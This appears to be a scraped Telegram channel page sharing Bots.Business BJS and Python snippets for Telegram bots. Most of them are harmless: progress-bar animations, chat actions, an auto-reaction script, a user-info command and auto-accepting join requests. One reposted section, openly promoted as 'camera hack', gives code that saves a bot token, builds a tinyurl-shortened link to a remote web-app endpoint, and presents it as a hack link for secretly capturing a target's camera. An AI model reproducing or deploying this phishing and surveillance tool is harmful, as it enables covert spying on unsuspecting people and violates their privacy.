en
Feedback
BOT HELP

BOT HELP

Open in Telegram
258
Subscribers
No data24 hours
+27 days
+630 days
Posts Archive
OTP ভেরিফিকেশন in dd bot

women ai image api + code 👍20 Like 👍
women ai image api + code 👍20 Like 👍

Repost from TNL AKASH 007
All Fix ᴀᴍᴇʀᴀ 𝐇ᴀᴄᴋ কিকরে ক্যামরা হ্যাক বট তৈরি করবেন সম্পূর্ণ ভিডিও দেওয়া আছে cobe লিংক https://t.me/botapihelp/25
নোট : সম্পূর্ণ ভিডিও দেখে ইউজ করবেন ভিডিওতে যেভাবে দেখিয়েছি ওইভাবে
api by > @tnlakash007 code by > @botapihelp

command : /start Answer : send me YouTube video link command : * Api.sendPhoto({ chat_id: chat.chatid, photo: message, captio
command : /start Answer : send me YouTube video link command : *
Api.sendPhoto({
  chat_id: chat.chatid, 
  photo: message, 
  caption: "api by @botapihelp",
  on_result: "onPhotoSent" 
});

import requests
import time

# Replace with your bot token
BOT_TOKEN = 'YOUR_BOT_TOKEN'

# List of reactions to send
reactions = ["👍", "❤️", "😂", "😲", "👏", "🔥", "😎", "💯", "😢", "😍"]

# Function to get the latest message in a chat
def get_latest_message_info(bot_token):
    url = f'https://api.telegram.org/bot{bot_token}/getUpdates'
    response = requests.get(url)
    data = response.json()

    if data["ok"] and "result" in data and len(data["result"]) > 0:
        # Get the latest message
        latest_message = data["result"][-1]["message"]
        chat_id = latest_message["chat"]["id"]
        message_id = latest_message["message_id"]
        return chat_id, message_id
    else:
        print("Failed to retrieve latest message.")
        return None, None

# Function to send reactions to a message
def send_reaction(bot_token, chat_id, message_id, reaction):
    url = f'https://api.telegram.org/bot{bot_token}/sendMessage'
    data = {
        'chat_id': chat_id,
        'text': reaction,
        'reply_to_message_id': message_id
    }
    response = requests.post(url, data=data)
    return response.json()

# Get latest chat ID and message ID
chat_id, message_id = get_latest_message_info(BOT_TOKEN)

# Send reactions if chat ID and message ID are retrieved successfully
if chat_id and message_id:
    for reaction in reactions:
        result = send_reaction(BOT_TOKEN, chat_id, message_id, reaction)
        if result.get("ok"):
            print(f"Successfully sent reaction: {reaction}")
        else:
            print(f"Failed to send reaction: {reaction}, Error: {result.get('description')}")
        time.sleep(2)  # Wait a few seconds between reactions
else:
    print("Unable to send reactions. Make sure the bot has access to the chat and that there are recent messages.")
Check this py CODES for auto reaction and it's for testing if they worked so tell me in comments and also replaced your bot token

YouTube Thumbnail download bot
YouTube Thumbnail download bot

ক্যামেরা হ্যাক bjs code command /start Answer
আপনার বট টোকেন দিন!! 𝐄ɴᴛᴇʀ 𝐘ᴏᴜʀ 𝐁ᴏᴛ 𝐓ᴏᴋᴇɴ..
bjs
// save_token কমান্ড
User.setProperty("bottoken", message, "string"); // ইউজারের ইনপুট সংরক্ষণ
Bot.sendInlineKeyboard(
  [
    [{ title: "📸 ᥴꪖꪑꫀ𝘳ꪖ 𝙷ꪖᥴ𝘬🪧", command: "hack" }] // বোতাম তৈরি
  ],
  "✅ আপনার বট টোকেন সংরক্ষণ করা হয়েছে!\n\nনিচের বোতামে ক্লিক করে পরবর্তী ধাপে যান।"
);
command : hack Bjs
let botToken = User.getProperty("bottoken");
if (botToken) {
  let chatId = user.telegramid; 
  let apiUrl = `https://api.bots.business/v2/bots/1521744/web-app/tnl?chatId=${chatId}&botToken=${botToken}`;

  
  HTTP.get({
    url: `http://tinyurl.com/api-create.php?url=${encodeURIComponent(apiUrl)}`, 
    success: "/handleApiResponse", 
    error: "handleApiError" 
  });
} else {
  Bot.sendMessage("⚠️ কোনো টোকেন সেভ করা হয়নি। দয়া করে প্রথমে টোকেন সেট করুন।");
}


function handleApiResponse() {
  let shortUrl = content; 
  Bot.sendMessage(" লিংকটা হচ্ছে আপনার ক্যামেরা হ্যাকের লিংক\n𝐋ɪɴᴋ 𝐈s 𝐘ᴏᴜʀ 𝐂ᴀᴍᴇʀᴀ 𝐇ᴀᴄᴋ 𝐋ɪɴᴋ \n𝐇ᴀᴄᴋ 𝐋ɪɴᴋ: " + shortUrl);
}


function handleApiError() {
  Bot.sendMessage("⚠️ ত্রুটি ঘটেছে! লিঙ্ক ছোট করা যায়নি।");
}
command : -/handleApiResponse
Bot.sendMessage("লিংকটা হচ্ছে আপনার ক্যামেরা হ্যাকের লিংক\n𝐋ɪɴᴋ 𝐈s 𝐘ᴏᴜʀ 𝐂ᴀᴍᴇʀᴀ 𝐇ᴀᴄᴋ 𝐋ɪɴᴋ \n𝐇ᴀᴄᴋ 𝐋ɪɴᴋ:  " + content);
api by > @tnlakash007 code by > @botapihelp

📞 How To Reply User In Support Command ? » Command = /SPM » Answer = ✅ Send User Telegram Id To Send Message: » Wait For Answer = On » BJS =
if(user.telegramid == "Owner Id"){
Bot.run({ 
command: "/PM",
options: { tgid : message }
})
}
>> Now Make A New Command For Sending Message. » Command = /PM » Answer = 📝 Enter Your Message For User: » Wait For Answer = On » BJS =
 var tgid = options.tgid
Api.sendMessage({
chat_id: tgid,
text: "*💬 Message From Admin\n➖➖➖➖➖➖➖➖➖➖➖➖\n➡️ Admin Messsage = "+message+"*",
parse_mode: "markdown" })
Bot.sendMessage("*📞 Message Sended To User = "+tgid+"*")

Progress bar loading animation - BJS Command: /progress
Bot.sendMessage("[ ░░░░░░░░░░░░░░░░░░░░░░░░░ ] 0%",
{
on_result: "/updated",parse_mode:"html", is_reply: false}
);
Command: /updated
let msg_id = options.result.message_id;
Api.editMessageText({text:"[ █████░░░░░░░░░░░░░░░░░░░░ ] 20%",message_id:msg_id})
Api.editMessageText({text:"[ ██████████░░░░░░░░░░░░░░░ ] 40%",message_id:msg_id})
Api.editMessageText({text:"[ ███████████████░░░░░░░░░░ ] 60%",message_id:msg_id})
Api.editMessageText({text:"[ ████████████████████░░░░░ ] 80%",message_id:msg_id})
Api.editMessageText({text:"[ █████████████████████████ ] 100%",message_id:msg_id})
Api.editMessageText({text:"Done !",message_id:msg_id})
@botapihelp

🕊️ Loading Code 💸 ⚡𝗖𝗼𝗺𝗺𝗮𝗻𝗱 ~ /hgk ⚡ 𝗕𝗝'𝘀 👇
Bot.sendMessage("- অনুগ্রহ করে কিছুক্ষণ অপেক্ষা করুন..! ",
{
on_result: "/hgk2", is_reply: false}
);//Code By @HGK_TEAM
⚡𝗖𝗼𝗺𝗺𝗮𝗻𝗱 ~ /hgk2 ⚡ 𝗕𝗝'𝘀 👇
let msg_id = options.result.message_id;
Bot.editMessage("■□□□□□□□□ 0%",msg_id)
Bot.editMessage("■□□□□□□□□ 5%",msg_id)
Bot.editMessage("■■□□□□□□□ 12%",msg_id)
Bot.editMessage("■■□□□□□□□ 17%",msg_id)
Bot.editMessage("■■■□□□□□□ 20%",msg_id)
Bot.editMessage("■■■□□□□□□ 28%",msg_id)
Bot.editMessage("■■■■□□□□□ 35%",msg_id)
Bot.editMessage("■■■■□□□□□ 45%",msg_id)
Bot.editMessage("■■■■■□□□□ 54%",msg_id)
Bot.editMessage("■■■■■□□□□ 60%",msg_id)
Bot.editMessage("■■■■■■□□□ 67% ",msg_id)
//Code By @HGK_TEAM
Bot.editMessage("■■■■■■□□□ 76%",msg_id)
Bot.editMessage("■■■■■■■□□ 88%",msg_id)
Bot.editMessage("■■■■■■■□□ 95%_",msg_id)
Bot.editMessage("■■■■■■■■□ 99%",msg_id)

Bot.editMessage("■■■■■■■■□ 99%",msg_id)

Bot.editMessage("■■■■■■■■■ 100%",msg_id)

Bot.editMessage("■■■■■■■■■ 100%",msg_id)

Bot.editMessage("Processing.",msg_id)

Bot.editMessage("Processing.",msg_id)

Bot.editMessage("Processing..",msg_id)

Bot.editMessage("Processing..",msg_id)

Bot.editMessage("Processing...",msg_id)
//Code By @HGK_TEAM
Bot.editMessage("Processing...",msg_id)

Bot.editMessage("Processing.",msg_id)

Bot.editMessage("Processing.",msg_id)

Bot.editMessage("Processing..",msg_id)

Bot.editMessage("Processing..",msg_id)

Bot.editMessage("Processing...",msg_id)

Bot.editMessage("Processing...",msg_id)

Bot.editMessage("Successful ✅",msg_id)

Bot.editMessage("Successful ✅",msg_id)

Bot.editMessage("Successful ✅",msg_id)
//Code By @HGK_TEAM
Bot.runCommand("/Menu")// - এটা আপডেট হওয়ার পর যে মেনুতে নিয়ে যাবে ওই Menu নাম দিবেন..! 
💸 𝙋𝙤𝙬𝙚𝙧𝙚𝙙 𝘽𝙮 - @HGK_TEAM 💸

Command: /info BJS:
Api.getUserProfilePhotos({
    user_id: user.telegramid,
    on_result: "onGetProfilePhotos"
});


Command: onGetProfilePhotos
BJS:
var userInfo=request.from
var text="<b>First Name</b> : "+userInfo.first_name+(userInfo.last_name ? "\n<b>Last Name</b> : "+userInfo.last_name :"" )+"\n<b>Telegram Premium</b> : "+(userInfo.is_premium ? "Yes ✅":"No ❌")+"\n<b>ID</b> : "+userInfo.id+""+"\n<b>UserName</b> : "+(userInfo.username ?"@"+userInfo.username:"🚫")
if(!options.ok){
   return Bot.sendMessage("Error!");
}

if(options.result.total_count==0){
   Bot.sendMessage(text)
   return
}

let photos = options.result.photos;

Api.sendPhoto( { photo: photos[0][0].file_id ,caption:text,parse_mode:"html"} );

Url Remover bjs code. Command: * Bjs code:
const user_link = Libs.commonLib.getLinkFor(user);

if (/(http[s]?:\/\/[^\s]+)/.test(request.text)) {
  Bot.sendMessage(user_link + ", we have removed your message because it contains a URL.");
  Api.deleteMessage({ chat_id: chat.chatid, message_id: request.message_id });
} else {
  Bot.sendMessage("No URL detected.");
}

Api.sendMessage({
  text:
   "<b><a href='https://t.me/"+request.chat.username+"/"+request.message_id+"'>ᴍᴇssᴀɢᴇ ɪᴅ:</a></b> <code>" +
    request.message_id +
    "</code>\n<b><a href='tg://user?id="+user.telegramid+"'>ʏᴏᴜʀ ɪᴅ:</a></b> <code>"+user.telegramid+"</code>\n<b><a href='https://t.me/"+request.chat.username+"'>ᴄʜᴀᴛ ɪᴅ:</a></b> <code>" +
    request.chat.id +
    "</code>", 
    parse_mode: "html",
reply_to_message_id: request.message_id
});
View https://t.me/tnlakash007/3076

🔥 bot action bjs 🔥 👉 Typing
Api.sendChatAction({
  chat_id: chat.chatid,
  action: "typing"
})
========================= 👉 Uploading Photo
Api.sendChatAction({
  chat_id: chat.chatid,
  action: "upload_photo"
})
========================= 👉 Recording A Video
Api.sendChatAction({
  chat_id: chat.chatid,
  action: "record_video"
})
========================= 👉 Sending A Video
Api.sendChatAction({
  chat_id: chat.chatid,
  action: "upload_video"
})
========================= 👉 Recoding A voice
Api.sendChatAction({
  chat_id: chat.chatid,
  action: "record_voice"
})
========================= 👉 Sending A voice
Api.sendChatAction({
  chat_id: chat.chatid,
  action: "upload_voice"
})
========================= 👉 Sending a file
Api.sendChatAction({
  chat_id: chat.chatid,
  action: "upload_document"
})
========================= 👉 Choosing A Sticker
Api.sendChatAction({
  chat_id: chat.chatid,
  action: "choose_sticker"
})
========================= 👉 Sending A Location
Api.sendChatAction({
  chat_id: chat.chatid,
  action: "find_location"
})
========================= 👉 Recording A Voice Note
Api.sendChatAction({
  chat_id: chat.chatid,
  action: "record_video_note"
})
========================= 👉 Sending Voice Note
Api.sendChatAction({
  chat_id: chat.chatid,
  action: "upload_video_note"
})
👨‍💻Code Developer - @botapihelp

Statistics - Total bot users - Bjs - [For bots.business] Command: /start BotJavaScript:
var botusers = User.getProperty("botusers");
if (!botusers)
{
let botusers = Libs.ResourcesLib.anotherChatRes("botusers", "global");
botusers.add(+1);
User.setProperty("botusers","user");
}
//Add this code at starting of the code. Command: /statistics BotJavaScript:
let botusers = Libs.ResourcesLib.anotherChatRes("botusers", "global");
Bot.sendMessage("Total users: "+botusers.value()+" users.");

🧩 Command :- /type 🖥 BJS :-
Api.sendMessage({
 text:"|",
 on_result: "/on_result " + params
})
🧩 Command :- /on_result
🖥 BJS :-  
 
var text = ""
for(var i in params.split("")){

Api.editMessageText({
message_id: options.result.message_id,
text: text + params.split("")[i] + "|"
})

Api.editMessageText({
message_id: options.result.message_id,
text: text + params.split("")[i] 
})
text += params.split("")[i]
}
👨‍💻Code Developer - @botapihelp ➡ Example: /type hello

Auto-Accept Join Requests in Channel Bot - BJS Command: *
if (!request) return

if (typeof request === "string") {
  try {
    request = JSON.parse(request)
  } catch (e) {
    return
  }
}

let info = request.chat_join_request

if (info) {
  Api.sendMessage({
    chat_id: info.from.id,
    text: "Your request to join the channel has been accepted."
  })

  Api.approveChatJoinRequest({
    chat_id: info.chat.id,
    user_id: info.from.id
  })
}
Note: The bot must be an admin in the channel for this to work. © @botapihelp